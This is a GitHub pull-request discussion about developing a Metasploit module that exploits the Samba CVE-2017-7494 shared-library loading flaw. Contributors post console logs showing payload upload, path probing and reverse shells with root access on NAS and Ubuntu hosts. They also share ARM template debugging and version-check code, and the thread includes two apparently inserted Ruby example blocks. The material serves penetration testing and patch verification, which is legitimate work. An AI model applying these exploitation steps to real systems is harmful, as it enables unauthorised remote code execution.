
First crack at Samba CVE-2017-7494 #8450

Merged (9 commits, May 25, 2017)

Conversation

@hdm (Contributor) commented May 25, 2017

This PR contains a module for the Samba arbitrary module loading vulnerability. It also includes support for x86 and ARMLE elf-so template formats. This has been extensively tested against an up to date Synology NAS and an Ubuntu 16.04 LTS x86_64 image. It needs testing against Linux ARMLE and Linux x86.

The default target is currently set to 2 (x86_64). Make sure to change this when testing other platforms.

Synology:

msf exploit(is_known_pipename) > run

[*] Started reverse TCP handler on 192.168.0.3:4444 
[*] 192.168.0.41:445 - Using location \\192.168.0.41\Temp\ for the path
[*] 192.168.0.41:445 - Payload is stored in //192.168.0.41/Temp/ as OofdIcVi.so
[*] 192.168.0.41:445 - Trying location /volume1/OofdIcVi.so...
[*] 192.168.0.41:445 - Trying location /volume1/Temp/OofdIcVi.so...
[*] Command shell session 2 opened (192.168.0.3:4444 -> 192.168.0.41:41100) at 2017-05-24 19:40:33 -0500

id
uid=0(root) gid=0(root) groups=0(root),100(users)

Ubuntu 16.04:

msf exploit(is_known_pipename) > exploit 

[*] Started reverse TCP handler on 192.168.0.3:4444 
[*] 192.168.0.3:445 - Using location \\192.168.0.3\yarp\h for the path
[*] 192.168.0.3:445 - Payload is stored in //192.168.0.3/yarp/h as GTithXJz.so
[*] 192.168.0.3:445 - Trying location /tmp/yarp/h/GTithXJz.so...
[*] Command shell session 6 opened (192.168.0.3:4444 -> 192.168.0.3:45076) at 2017-05-24 19:41:40 -0500

id
uid=65534(nobody) gid=0(root) groups=0(root),65534(nogroup)

The stuff left on my TODO for this (via additional PR if needed):

  • Look into other ways to exploit this without knowing the server-side path (/proc/self/cwd, etc)
  • Fingerprint specific OS configurations via blocking on FIFO pipe reads
  • Additional support for other architectures

It would be really neat if this could just cycle all possible architectures once it figured out a writeable path. If the module has trouble finding a writable path, you can specify it manually via SMB_SHARE_NAME, SMB_FOLDER, and SMB_SHARE_BASE.

@wvu-r7 (Member) commented May 25, 2017

Coincidentally, I think this resolves #7723. Double win.

@busterb (Member) commented May 25, 2017

Nice, thanks for fixing the .so templates!

@h00die (Contributor) commented May 25, 2017

Synology DS412+ w/ INTEL Atom D2700 on DSM 6.1.1-15101 Update 2 (update 3 is current, will test that in a minute)

msf exploit(is_known_pipename) > exploit

[*] Started reverse TCP handler on 1.2.3.117:4444 
[*] 1.2.3.119:445 - Using location \\1.2.3.119\ESX\ for the path
[*] 1.2.3.119:445 - Payload is stored in //1.2.3.119/ESX/ as eePUbtdw.so
[*] 1.2.3.119:445 - Trying location /volume1/eePUbtdw.so...
[-] 1.2.3.119:445 - Probe: /volume1/eePUbtdw.so: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)
[*] 1.2.3.119:445 - Trying location /volume1/ESX/eePUbtdw.so...
[*] Command shell session 1 opened (1.2.3.117:4444 -> 1.2.3.119:34366) at 2017-05-24 21:12:07 -0400

id
uid=0(root) gid=0(root) groups=0(root),100(users)
uname -a
Linux synologyNAS 3.10.102 #15101 SMP Fri May 5 12:01:38 CST 2017 x86_64 GNU/Linux synology_cedarview_412+

@OJ (Contributor) commented May 25, 2017

Scarily consistent output at my end too:

msf exploit(is_known_pipename) > run

[*] [2017.05.25-11:23:53] Started reverse TCP handler on <nope>:5555 
[*] [2017.05.25-11:23:54] <nope>:445 - Using location \\<nope>\<nope>\ for the path
[*] [2017.05.25-11:23:54] <nope>:445 - Payload is stored in //<nope>/<nope>/ as WDRFSUkE.so
[*] [2017.05.25-11:23:54] <nope>:445 - Trying location /volume1/WDRFSUkE.so...
[*] [2017.05.25-11:23:54] <nope>:445 - Trying location /volume1/<nope>/WDRFSUkE.so...
[*] Command shell session 2 opened (<nope>:5555 -> <nope>:40206) at 2017-05-25 11:23:54 +1000

id
uid=0(root) gid=0(root) groups=0(root),100(users)
uname -a
Linux NAS 3.10.102 #15101 SMP Fri May 5 12:01:38 CST 2017 x86_64 GNU/Linux synology_cedarview_1512+

👍

The module leaves the .so files behind on disk, I assume that cleanup isn't something that can happen until the session has finished, right?

@h00die (Contributor) commented May 25, 2017

same result after going fully up to date on mine (update 3).
I'll stab out some docs in a few min just so we're on the same page on what's been tested and confirmed and what hasn't

samba version 4.4.9 for the record

@wwebb-r7 (Contributor) commented May 25, 2017

No dice on armle based WD glorified-external-drive NAS. The module itself works just fine at first glance

sorry, my hostname is not very gh friendly

---:/shares/research# file /usr/sbin/samba_multicall 
/usr/sbin/samba_multicall: ELF 32-bit LSB executable, ARM, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.31, BuildID[sha1]=0x2f0327768cf7edf270387fdb1380fcd64e99b666, not stripped
---:/shares/research# file eRoaKgKM.so 
eRoaKgKM.so: ELF 32-bit LSB shared object, ARM, version 1 (SYSV), dynamically linked, stripped
---:/shares/research# uname -a
Linux --- 3.2.26 #1 SMP Thu Jul 9 11:14:15 PDT 2015 wd-2.4-rel armv7l GNU/Linux
---:/shares/research# 

I have some more armle devices I can test later and actually debug it without going through an act of congress. Probably won't get around to that until tomorrow evening at best.

@h00die (Contributor) commented May 25, 2017

module docs: hdm#15
@OJ need to know your DSM version and samba version if it isn't a DSM already listed
@wwebb-r7 what version of samba and what WD NAS OS is that?
@hdm need similar info on version numbers

@wvu-r7 (Member) commented May 25, 2017

Works right out of the box (no configuration) on Samba 4.1.13 on Ubuntu 15.04 (my exploit dev VM).

msf exploit(is_known_pipename) > run

[*] Started reverse TCP handler on 192.168.33.1:4444 
[*] 192.168.33.129:445 - Using location \\192.168.33.129\[redacted]\ for the path
[*] 192.168.33.129:445 - Payload is stored in //192.168.33.129/[redacted]/ as ITmrMclX.so
[*] 192.168.33.129:445 - Trying location /volume1/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume1/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume1/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume1/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume2/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume2/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume2/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume2/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume3/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume3/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume3/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume3/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /shared/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /shared/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /shared/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /shared/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/usb/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/usb/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/usb/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/usb/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /media/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /media/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /media/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /media/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/media/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/media/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/media/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/media/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /var/samba/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /var/samba/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /var/samba/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /var/samba/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /tmp/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /tmp/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /tmp/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /tmp/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /home/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /home/[redacted]/ITmrMclX.so...
[*] Sending stage (2849784 bytes) to 192.168.33.129
[*] Meterpreter session 1 opened (192.168.33.1:4444 -> 192.168.33.129:56646) at 2017-05-24 21:24:14 -0500

meterpreter > 

I did switch to Meterpreter (Mettle), though. :-)

@wvu-r7 (Member) commented May 25, 2017

Just updated!

@busterb (Member) commented May 25, 2017

Tested template on an Ubuntu 17.04 chroot on an ARMv7 chromebook, similar results to above. Looks like an .so ABI mismatch:

bcook@localhost:/var/opt/bcook$ file /lib/arm-linux-gnueabihf/ld-2.24.so 
/lib/arm-linux-gnueabihf/ld-2.24.so: ELF 32-bit LSB shared object, ARM, EABI5 version 1 (SYSV), dynamically linked, BuildID[sha1]=8b848f4f76562d20faf06ff375f30318c696fd82, stripped
bcook@localhost:/var/opt/bcook$ file /var/opt/bcook/QCwTHZfa.so 
/var/opt/bcook/QCwTHZfa.so: ELF 32-bit LSB shared object, ARM, version 1 (SYSV), dynamically linked, stripped
bcook@localhost:/var/opt/bcook$ LD_PRELOAD=/var/opt/bcook/QCwTHZfa.so /bin/true
ERROR: ld.so: object '/var/opt/bcook/QCwTHZfa.so' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.

ii samba 2:4.4.5+dfsg-2ubuntu5.5 armhf SMB/CIFS file, print, and login server for Unix

I suspect we need to use EABI for the arm template, which is a lot more common these days than the original OABI spec. Might be nice if metasploit accounted for things like ABI specs, but for now we probably need to just go with most-common denominator.

@busterb (Member) commented May 25, 2017

I guess we can consider 'armle' in metasploit equivalent to 'armel' and should be either EABI or OABI (still reading on differences). We could perhaps add an ARCH_ARMHF architecture as well for ARMv7+ EABI support.

https://wiki.embeddedarm.com/wiki/EABI_vs_OABI

@wwebb-r7 (Contributor) commented May 25, 2017

Without explaining my network topology, I can't check right now. Sorry getting a migraine or something similar.

I don't even have linux on this laptop for more RE tools, but the ARM file trips up IDA as well

[screenshot: illegal]

Best effort I've got at the moment

@wvu-r7 wvu-r7 self-assigned this May 25, 2017

@nixawk (Contributor) commented May 25, 2017

Could we add a method to check vulnerable versions?

def check
  # vulnerable version match
end


Bug Flow

  1. is_known_pipename (./source3/rpc_server/srv_pipe.c)
  2. smb_probe_module (./lib/util/modules.c)
  3. do_smb_load_module (./lib/util/modules.c)
  4. load_module (./lib/util/modules.c)
  5. dlopen

@bcoles (Contributor) commented May 25, 2017

@nixawk I don't see why not. Could also verify OS. Here's some spaghetti code using smb_fingerprint:

def check
  res = smb_fingerprint

  os = res['os']
  vprint_status("Operating System: #{os}")

  # caution: Samba 4.1.12+ can advertise 'Windows ...' as its native OS too
  # (see tsellers-r7's note further down), so this gate can misfire
  if os =~ /Windows/i
    vprint_status('Target operating system not supported')
    return CheckCode::Safe
  end

  # the native LAN Manager string carries "Samba x.y.z" (suffixes such as
  # "-Debian" are dropped by the character class)
  smb_version = res['native_lm'].to_s.scan(/Samba ([\d\.]+)/).flatten.first
  if smb_version.nil?
    vprint_status('Could not determine Samba version')
    return CheckCode::Unknown
  end
  vprint_status("Samba version: #{smb_version}")

  # 3.x and 4.x branches affected
  return CheckCode::Safe if smb_version !~ /^[34]\./

  # 3.x branch - versions prior to 3.5.0 are safe
  return CheckCode::Safe if smb_version =~ /^3\.[0-4]\./

  # 4.x branch - patched in 4.4.14 / 4.5.10 / 4.6.4
  # (4.0 - 4.3 never received the fix; 4.4.0-13, 4.5.0-9 and 4.6.0-3 are unpatched)
  if smb_version =~ /^4\./
    if smb_version !~ /^4\.([0-3]\.\d+|4\.[0-9]|4\.1[0-3]|5\.[0-9]|6\.[0-3])$/
      return CheckCode::Safe
    end
  end

  connect
  smb_login
  find_writeable_share_path
  disconnect

  if @share.to_s.eql?('')
    vprint_status('Could not find a writeable share')
    return CheckCode::Detected
  end

  vprint_status("Found writeable share: #{@share}")
  CheckCode::Appears
end

@bcoles (Contributor) commented May 25, 2017

+1 for not working with ARM. Tested with QNAP NAS.

$ uname -a
Linux --- 3.2.26 #2 SMP Tue May 16 06:17:55 CST 2017 armv7l unknown
$ smb2status
smbd (samba daemon) Version 4.4.9

@jhart-r7 (Contributor) commented May 25, 2017

@bcoles @nixawk , I've got a WIP commit that should help with the checking part of this. Coincidentally it is similar to @bcoles' POC.

#8452

@Medicean commented May 25, 2017

Works right 👍 👍

msf > use exploit/linux/samba/is_known_pipename
msf exploit(is_known_pipename) > set RHOST 192.168.35.197
RHOST => 192.168.35.197
msf exploit(is_known_pipename) > show options

Module options (exploit/linux/samba/is_known_pipename):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   RHOST           192.168.35.197   yes       The target address
   RPORT           445              yes       The SMB service port (TCP)
   SMB_FOLDER                       no        The directory to use within the writeable SMB share
   SMB_SHARE_BASE                   no        The remote filesystem path correlating with the SMB share name
   SMB_SHARE_NAME                   no        The name of the SMB share containing a writeable directory


Exploit target:

   Id  Name
   --  ----
   2   Linux x86_64


msf exploit(is_known_pipename) > run

[*] Started reverse TCP handler on 192.168.35.197:4444
[*] 192.168.35.197:445 - Using location \\192.168.35.197\share\ for the path
[*] 192.168.35.197:445 - Payload is stored in //192.168.35.197/share/ as dDUJiiuf.so
[*] 192.168.35.197:445 - Trying location /volume1/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume1/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume1/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume1/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume2/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume2/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume2/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume2/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume3/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume3/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume3/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume3/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /shared/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /shared/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /shared/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /shared/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/usb/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/usb/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/usb/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/usb/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /media/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /media/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /media/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /media/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/media/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/media/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/media/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/media/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /var/samba/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /var/samba/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /var/samba/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /var/samba/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /tmp/dDUJiiuf.so...
[*] Command shell session 1 opened (192.168.35.197:4444 -> 192.168.35.197:58089) at 2017-05-25 13:26:19 +0800

id
uid=65534(nobody) gid=0(root) groups=0(root),65534(nogroup)

whoami
nobody

phdrsize equ $ - phdr
dd 2 ; p_type = PT_DYNAMIC
dd 7 ; p_flags = rwx

@timwr (Contributor) May 25, 2017

p_flags needs to move to after p_memsz (like in the PT_LOAD section)

@hdm (Author, Contributor) May 25, 2017

Have you tested with this change?

@timwr (Contributor) May 25, 2017

I'm struggling to get a decent test environment set up. I can test with LD_PRELOAD on Android and Linux debian-armel 3.2.0-4-versatile #1 Debian 3.2.51-1 armv5tejl GNU/Linux. Neither are working for me (even after this change).
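The review thread above turns on ELF32 program-header layout: in a 32-bit ELF, p_flags comes after p_memsz, and writing it right after p_type (the ELF64 order) shifts every later field. The following is an added example, not code from the PR or the Metasploit tree: it parses ELF32 program headers in the correct order, flags an entry whose fields were emitted in ELF64 order, and reports an e_flags word with no ARM EABI version (the difference busterb's `file` output shows). The sample .so bytes are constructed inline and are not from any real template.

```ruby
# Added example (not from the PR): sanity-check the program headers of an
# ELF32 little-endian shared object. It catches the field-order bug raised in
# this review thread (p_flags emitted right after p_type, the ELF64 layout)
# and reports an ELF header carrying no ARM EABI version.

PT_LOAD    = 1
PT_DYNAMIC = 2
PF_ALL     = 0x7 # PF_X | PF_W | PF_R

# ELF32 Phdr field order: type, offset, vaddr, paddr, filesz, memsz, flags, align.
# (ELF64 puts p_flags second; an ELF32 template must not copy that layout.)
PHDR32_FIELDS = %w[p_type p_offset p_vaddr p_paddr p_filesz p_memsz p_flags p_align].freeze

def parse_elf32(data)
  raise 'not an ELF file' unless data.byteslice(0, 4) == "\x7FELF".b
  raise 'not ELF32 little-endian' unless data.getbyte(4) == 1 && data.getbyte(5) == 1
  e_phoff = data.byteslice(28, 4).unpack1('V')
  e_flags = data.byteslice(36, 4).unpack1('V')
  e_phentsize, e_phnum = data.byteslice(42, 4).unpack('vv')
  raise "unexpected e_phentsize #{e_phentsize}" unless e_phentsize == 32
  phdrs = Array.new(e_phnum) do |i|
    PHDR32_FIELDS.zip(data.byteslice(e_phoff + i * 32, 32).unpack('V8')).to_h
  end
  { e_flags: e_flags, phdrs: phdrs }
end

def phdr_problems(ph, file_size)
  problems = []
  if (ph['p_flags'] & ~PF_ALL) != 0
    problems << format('p_flags 0x%x has bits outside PF_R|PF_W|PF_X', ph['p_flags'])
  end
  problems << 'p_memsz smaller than p_filesz' if ph['p_memsz'] < ph['p_filesz']
  problems << 'segment runs past end of file' if ph['p_offset'] + ph['p_filesz'] > file_size
  if ph['p_align'] > 1 && ph['p_offset'] % ph['p_align'] != ph['p_vaddr'] % ph['p_align']
    problems << 'p_offset and p_vaddr disagree modulo p_align'
  end
  problems
end

# The ARM EABI version is the top byte of e_flags; `file` prints it as "EABI5",
# and it is what the template .so in busterb's output lacks next to the system ld.so.
def audit_elf32(data)
  elf = parse_elf32(data)
  {
    eabi_version: elf[:e_flags] >> 24,
    phdrs: elf[:phdrs].each_with_index.map { |ph, i|
      { index: i, type: ph['p_type'], problems: phdr_problems(ph, data.bytesize) }
    }
  }
end

# Constructed sample: a 116-byte ELF32 ARM object with e_flags = 0 (no EABI
# version), one correct PT_LOAD header, and a PT_DYNAMIC header written in
# ELF64 field order (type, flags=7, offset, vaddr, paddr, filesz, memsz, align).
def build_sample_so
  ident = "\x7FELF".b + [1, 1, 1, 0].pack('C4') + ("\x00" * 8).b
  ehdr  = ident + [3, 40, 1, 0, 52, 0, 0, 52, 32, 2, 0, 0, 0].pack('v2V5v6')
  good_load = [PT_LOAD, 0, 0, 0, 116, 116, 0x5, 0x1000].pack('V8')
  bad_dyn   = [PT_DYNAMIC, 7, 0x60, 0x60, 0x60, 0x10, 0x10, 4].pack('V8')
  ehdr + good_load + bad_dyn
end

if __FILE__ == $PROGRAM_NAME
  report = audit_elf32(build_sample_so)
  puts "EABI version in e_flags: #{report[:eabi_version]} (0 = none/OABI)"
  report[:phdrs].each do |r|
    puts "phdr[#{r[:index]}] type=#{r[:type]}: #{r[:problems].empty? ? 'ok' : r[:problems].join('; ')}"
  end
end
```

Run against a real template output (`audit_elf32(File.binread('x.so'))`) the misordered PT_DYNAMIC shows up as an offset of 7 and a p_flags value that is really p_memsz.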

@Marin111 commented May 25, 2017

For CentOS 6.5 it's not successful.

@xmycroftx commented May 25, 2017

Osx uses smbx which supposedly happened to avoid smb3(gplv3). Worth a test though.

@hdm (Contributor, Author) commented May 25, 2017

Thanks folks! Sounds like we need to:

  • Fix ARMLE support
  • Look into Mac OS X support
  • Delete the .so after the module completes

Additionally, Mr. Tavis Ormandy suggested a nice way to exploit this without knowing the path using two connections and /proc/self/cwd, which I will try to implement in the near future (this PR if it's languishing, or the next one).

I would love some help for ARMLE, MIPS, and OS X (for .so templates).

@bcoles (Contributor) commented May 25, 2017

@hiw0rld do you have a stack trace? I don't see .dup used anywhere in this PR.

@busterb (Member) commented May 25, 2017

Dear spectators - a pull request is a work-in-progress. If you do not know how to debug problems, pull code into your branch, or to expect some rough edges, then please abstain from commenting until this pull request has been merged. Otherwise it becomes noise that simply slows down progress. Thanks!

@tsellers-r7 commented May 25, 2017

@bcoles @hdm @wvu-r7

FYI, if you implement vulnerability checking please keep in mind that at least some versions of Samba include Windows in the Native OS value.

For example, on Kali with Samba 4.5.6 installed:

user@kali:~$ smbd --version
Version 4.5.6-Debian

Wireshark image:
screen shot 2017-05-25 at 8 39 21 am

Reference:
https://github.com/samba-team/samba/blob/aa43d0d81baa497135a17e843b05336b4a504809/source3/smbd/sesssetup.c#L50

Looks like this was changed from Unix to Windows in January 2014, released in 4.1.12 or 4.1.13 (I think) :
samba-team/samba@666948c
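A version classifier that keys on the Native LAN Manager string rather than Native OS, for the reason given above, and applies the fix versions named in this thread (4.4.14, 4.5.10, 4.6.4, with 3.5.0 as the first affected release). This is an added example, not code from the PR or from Metasploit; it assumes that 4.7 and later, released after the fix, need no separate range.

```ruby
# Added example (not from the PR): pull the Samba version out of the SMB
# session-setup strings and classify it against the CVE-2017-7494 fix
# versions named in this thread (4.4.14, 4.5.10, 4.6.4; 3.5.0 first affected).

# Samba has advertised "Windows ..." as its Native OS since 4.1.12/4.1.13 (see
# tsellers-r7's note), so native_os is deliberately ignored and only the
# Native LAN Manager string is trusted to identify Samba.
def samba_version(_native_os, native_lm)
  m = native_lm.to_s.match(/\bSamba\s+(\d+)\.(\d+)\.(\d+)/i)
  return nil unless m
  m.captures.map(&:to_i) # "Samba 4.5.6-Debian" => [4, 5, 6]
end

FIRST_AFFECTED = [3, 5, 0].freeze
FIXED_IN = { [4, 4] => 14, [4, 5] => 10, [4, 6] => 4 }.freeze

# Returns :vulnerable, :safe or :unknown (not Samba, or version not advertised).
def cve_2017_7494_status(native_os, native_lm)
  v = samba_version(native_os, native_lm)
  return :unknown unless v
  return :safe if (v <=> FIRST_AFFECTED) < 0    # 3.0.x .. 3.4.x
  return :vulnerable if v[0] == 3               # 3.5.0 .. 3.6.x, never patched
  return :vulnerable if v[0] == 4 && v[1] < 4   # 4.0 .. 4.3, end of life before the fix
  fixed = FIXED_IN[v[0, 2]]
  return :safe unless fixed                     # assumption: 4.7+ shipped after the fix
  v[2] < fixed ? :vulnerable : :safe
end

if __FILE__ == $PROGRAM_NAME
  # constructed fingerprints: a Samba host that claims Windows, a patched host,
  # and a genuine Windows host that the classifier must not guess about
  [['Windows 6.1', 'Samba 4.5.6-Debian'],
   ['Unix', 'Samba 4.4.14'],
   ['Windows 7 Professional 7601 Service Pack 1', 'Windows 7 Professional 6.1']].each do |os, lm|
    puts format('%-45s %-30s %s', os, lm, cve_2017_7494_status(os, lm))
  end
end
```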

@hashtaginfosec commented May 25, 2017

Ran it against Synology Disk Station DS212j and got no-access and STATUS_ACCOUNT_DISABLED. I think this is because default admin account is disabled.

[*] Started reverse TCP handler on 192.168.1.100:4444
[-] 192.168.1.101:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_ACCOUNT_DISABLED (Command=115 WordCount=0)
[*] Exploit completed, but no session was created.

@Viss commented May 25, 2017

synology nas DS1815+ vulnerable as well!

@0x00string commented May 25, 2017

I'm getting the following error when running the exploit against:

Linux HOSTNAME 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

With samba version:

Version 4.3.11-Ubuntu

[-] 172.20.32.4:445 - Exploit failed: Rex::Proto::SMB::Exceptions::NoReply The SMB server did not reply to our request

Exploit dies after getting a RST in response to Tree Disconnect after uploading the test .txt file.

my smb.conf lines for the shares are as follows:

[sambashare]
path = /sambashare
browsable = yes
public = yes
writable = yes
guest ok = yes
create mask = 0644
directory mask = 0755
force user = shareuser

[simple]
path = /simpleshare
public = yes
writeable = yes
guest ok = yes
browsable = yes

Thanks to @hdm for inadvertently fixing my msfvenom bug too!

@egypt (Contributor) commented May 25, 2017

@hdm how close would you say this is to done? Would it be reasonable to land this in its current state and continue dev in a new PR?

@wvu-r7 (Member) commented May 25, 2017

I'm ready to ship this. It works quite well.

@hdm (Contributor, Author) commented May 25, 2017

@egypt This should be good to go for now. I added the BruteforcePID advanced option for folks who want to test, but it's disabled by default. The code now also autodeletes the payload from the share.

@hdm (Contributor, Author) commented May 25, 2017

Should we disable the ARM target or forcibly set 'SHELL' on the payload option?

@hdm (Contributor, Author) commented May 25, 2017

@QasimChadhar That happens when Guest is 'disabled'

@hdm (Contributor, Author) commented May 25, 2017

@reznok Double check to make sure the patch wasn't automatically installed

hdm added 2 commits May 25, 2017

@h00die (Contributor) commented May 25, 2017

The PR for the docs is ready to land before this is landed. It's good enough for the time being

docs for is_known_pipename
wvu-r7 added a commit to wvu-r7/metasploit-framework that referenced this pull request May 25, 2017
@wvu-r7 wvu-r7 merged commit 4ec5831 into rapid7:master May 25, 2017
1 check was pending: continuous-integration/travis-ci/pr (The Travis CI build is in progress)

@OJ (Contributor) commented May 25, 2017

Nice

@hiw0rld commented May 26, 2017

@bcoles I don't use any stack trace, you mean client or samba server?

@hdm hdm deleted the hdm:module/CVE-2017-7494 branch May 26, 2017

@nixawk (Contributor) commented May 26, 2017

Bug Flow

-> /path/to/samba-X.X.XX

[screenshot: bug-flow]

@hdm (Contributor, Author) commented May 28, 2017

Maybe time to lock this PR for future comments?

@wvu-r7 (Member) commented May 28, 2017

Agreed. This is not a support forum, folks. Take it to IRC or the Rapid7 Community site. File a ticket if it's a bug.

@rapid7 rapid7 locked and limited conversation to collaborators May 28, 2017
@h00die h00die added the docs label May 29, 2017

@alrosenthal-r7 commented May 31, 2017

Release Notes

The exploits/linux/samba/is_known_pipename module has been added to the framework. This module exploits Samba from versions 3.5.0-4.4.14, 4.5.10, and 4.6.4 by loading a malicious shared library. The exploit requires valid credentials, a writeable folder in an accessible share, and the server-side path of the writeable folder. However, in some cases anonymous access with common filesystem locations can be used to automate exploitation.

@hdm (Contributor, Author) commented Jun 1, 2017

^ no longer true with the current PR.

@h00die (Contributor) commented Jun 1, 2017

May need to update the docs and info section (or just the docs). I have a note to review and update the MD tomorrow to update
